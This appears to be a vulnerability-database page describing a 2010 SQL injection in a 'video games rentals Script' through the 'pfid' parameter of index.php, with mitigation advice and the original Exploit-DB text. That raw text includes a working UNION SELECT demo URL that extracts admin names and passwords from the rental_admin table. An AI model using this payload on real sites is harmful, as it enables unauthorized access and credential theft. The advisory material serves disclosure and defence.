video games rentals Script SQL injection Vulnerability

vendor:

video games rentals Script

by:

JaMbA

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: video games rentals Script

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows & Linux

2010

video games rentals Script SQL injection Vulnerability

The video games rentals Script is vulnerable to SQL injection. An attacker can exploit this vulnerability by injecting malicious SQL code into the 'pfid' parameter of the 'index.php' page. This can lead to unauthorized access, data manipulation, and potential compromise of the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before executing SQL queries. Also, implementing parameterized queries or using prepared statements can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: video games rentals Script SQL injection Vulnerability
# Date: 11/02/2010
# Author: JaMbA
# Software Link: N/A
# Version: all version
# Tested on: Windows & Linux
# CVE : ()

:::::::::::::::::::::::::

Exploit Title : video games rentals Script SQL injection Vulnerability

Author : JaMbA

Script Site : www.commodityrentals.com

Version : All Versions

Tested on : Windows & Linux

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:::::::::::::::::::::::::

=====================================Exploit===============

=========================

[ EXPL0!T ]

www.[Server}.com/[Path]/index.php?view=catalog&pfid=5[exploit code]&item_type=G

[ D3M0 ]

http://server/index.php?view=catalog&pfid=-5+union+select+1,concat(admin_name,0x3a,admin_password),3,4,5+from+rental_admin--&item_type=G


Have Fun :D

===========================================================

=========================

Greetz to : Alnjm33-virus-pal - Predator-bingo2 - xXx-jago-dz -inejcteur-4PY-SaYrOs- XR57 -Tr0y-x Ahmadso -alsaek
=== 3SI lycee jbel jloud ====